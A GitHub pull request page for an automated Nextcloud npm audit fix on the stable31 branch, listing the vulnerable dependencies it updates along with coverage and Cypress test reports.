Skip to content

[stable31] Fix npm audit #1908

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
artonge merged 1 commit into from
Mar 24, 2025
Merged

[stable31] Fix npm audit #1908

artonge merged 1 commit into from
Mar 24, 2025

Conversation

@nextcloud-command
Copy link
Contributor

@nextcloud-command nextcloud-command commented Mar 9, 2025
edited
Loading

Audit report

This audit fix resolves 18 of the total 29 vulnerabilities found in your project.

Updated dependencies

Fixed vulnerabilities

@babel/helpers #

  • Babel has inefficient RexExp complexity in generated code with .replace when transpiling named capturing groups
  • Severity: moderate (CVSS 6.2)
  • Reference: GHSA-968p-4wvh-cqc8
  • Affected versions: <7.26.10
  • Package usage:
    • node_modules/@babel/helpers

@babel/runtime #

  • Babel has inefficient RexExp complexity in generated code with .replace when transpiling named capturing groups
  • Severity: moderate (CVSS 6.2)
  • Reference: GHSA-968p-4wvh-cqc8
  • Affected versions: <7.26.10
  • Package usage:
    • node_modules/@babel/runtime

@nextcloud/dialogs #

  • Caused by vulnerable dependency:
  • Affected versions: >=4.2.0-beta.1
  • Package usage:
    • node_modules/@nextcloud/dialogs

@nextcloud/l10n #

  • Caused by vulnerable dependency:
  • Affected versions: 1.1.0 - 3.1.0
  • Package usage:
    • node_modules/@nextcloud/moment/node_modules/@nextcloud/l10n

@nextcloud/moment #

  • Caused by vulnerable dependency:
  • Affected versions: >=1.1.1
  • Package usage:
    • node_modules/@nextcloud/moment

@testing-library/vue #

@vitest/coverage-v8 #

  • Caused by vulnerable dependency:
  • Affected versions: <=2.2.0-beta.2
  • Package usage:
    • node_modules/@vitest/coverage-v8

@vitest/mocker #

  • Caused by vulnerable dependency:
  • Affected versions: <=3.0.0-beta.4
  • Package usage:
    • node_modules/@vitest/mocker

@vue/test-utils #

  • Caused by vulnerable dependency:
  • Affected versions: <=1.3.6
  • Package usage:
    • node_modules/@vue/test-utils

axios #

  • axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
  • Severity: high
  • Reference: GHSA-jr5f-v2jv-69x6
  • Affected versions: <1.8.2
  • Package usage:
    • node_modules/axios

cypress-vite #

  • Caused by vulnerable dependency:
  • Affected versions: 1.0.2 - 1.5.0
  • Package usage:
    • node_modules/cypress-vite

node-gettext #

  • node-gettext vulnerable to Prototype Pollution
  • Severity: high (CVSS 5.9)
  • Reference: GHSA-g974-hxvm-x689
  • Affected versions: *
  • Package usage:
    • node_modules/node-gettext

vite #

  • Caused by vulnerable dependency:
  • Affected versions: 0.11.0 - 6.1.1
  • Package usage:
    • node_modules/vite

vite-node #

  • Caused by vulnerable dependency:
  • Affected versions: <=2.2.0-beta.2
  • Package usage:
    • node_modules/vite-node

vitest #

  • Caused by vulnerable dependency:
  • Affected versions: 0.0.1 - 0.0.12 || 0.0.29 - 0.0.122 || 0.3.3 - 3.0.0-beta.4
  • Package usage:
    • node_modules/vitest

vue-resize #

  • Caused by vulnerable dependency:
  • Affected versions: 0.4.0 - 1.0.1
  • Package usage:
    • node_modules/vue-resize

vue-template-compiler #

  • vue-template-compiler vulnerable to client-side Cross-Site Scripting (XSS)
  • Severity: moderate (CVSS 4.2)
  • Reference: GHSA-g3ch-rx76-35fx
  • Affected versions: >=2.0.0
  • Package usage:
    • node_modules/vue-template-compiler

vuex #

  • Caused by vulnerable dependency:
  • Affected versions: 3.1.3 - 3.6.2
  • Package usage:
    • node_modules/vuex

@nextcloud-command nextcloud-command added 3. to review dependencies Pull requests that update a dependency file labels Mar 9, 2025
@codecov
Copy link

codecov bot commented Mar 9, 2025
edited
Loading

Codecov Report

All modified and coverable lines are covered by tests ✅

Project coverage is 30.85%. Comparing base (5b28624) to head (1837795).
Report is 6 commits behind head on stable31.

Additional details and impacted files 
@@            Coverage Diff            @@
##           stable31    #1908   +/-   ##
=========================================
  Coverage     30.85%   30.85%           
=========================================
  Files            43       43           
  Lines          1617     1617           
  Branches        110      110           
=========================================
  Hits            499      499           
  Misses         1092     1092           
  Partials         26       26

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

@cypress
Copy link

cypress bot commented Mar 9, 2025
edited
Loading

Activity    Run #2358

Run Properties:  status check passed Passed #2358  •  git commit f392b38188: [stable31] Fix npm audit
Project Activity
Branch Review automated/noid/stable31-fix-npm-audit
Run status status check passed Passed #2358
Run duration 02m 09s
Commit git commit f392b38188: [stable31] Fix npm audit
Committer Nextcloud Command Bot
View all properties for this run ↗︎
Test results
Tests that failed  Failures 0
Tests that were flaky  Flaky 0
Tests that did not run due to a developer annotating a test with .skip  Pending 0
Tests that did not run due to a failure in a mocha hook  Skipped 0
Tests that passed  Passing 10
View all changes introduced in this branch ↗︎

@nextcloud-command nextcloud-command force-pushed the automated/noid/stable31-fix-npm-audit branch from 602fbd2 to 909f87e Compare March 16, 2025 03:25
@miaulalala miaulalala force-pushed the automated/noid/stable31-fix-npm-audit branch from 909f87e to 521def9 Compare March 17, 2025 11:01
@miaulalala
Copy link
Collaborator

miaulalala commented Mar 17, 2025

/compile /

@miaulalala
Copy link
Collaborator

miaulalala commented Mar 17, 2025

/compile amend /

@nextcloud-command nextcloud-command force-pushed the automated/noid/stable31-fix-npm-audit branch from 521def9 to e7cacef Compare March 17, 2025 11:13
@nextcloud-command nextcloud-command force-pushed the automated/noid/stable31-fix-npm-audit branch from e7cacef to 1837795 Compare March 23, 2025 03:38
@artonge artonge enabled auto-merge March 24, 2025 09:17
@artonge artonge merged commit cc48b55 into stable31 Mar 24, 2025
55 of 64 checks passed
@artonge artonge deleted the automated/noid/stable31-fix-npm-audit branch March 24, 2025 09:27
@Altahrim Altahrim mentioned this pull request Apr 3, 2025
Merged
2 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@artonge artonge artonge approved these changes

Assignees

No one assigned

Labels

3. to review dependencies Pull requests that update a dependency file

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@nextcloud-command @miaulalala @artonge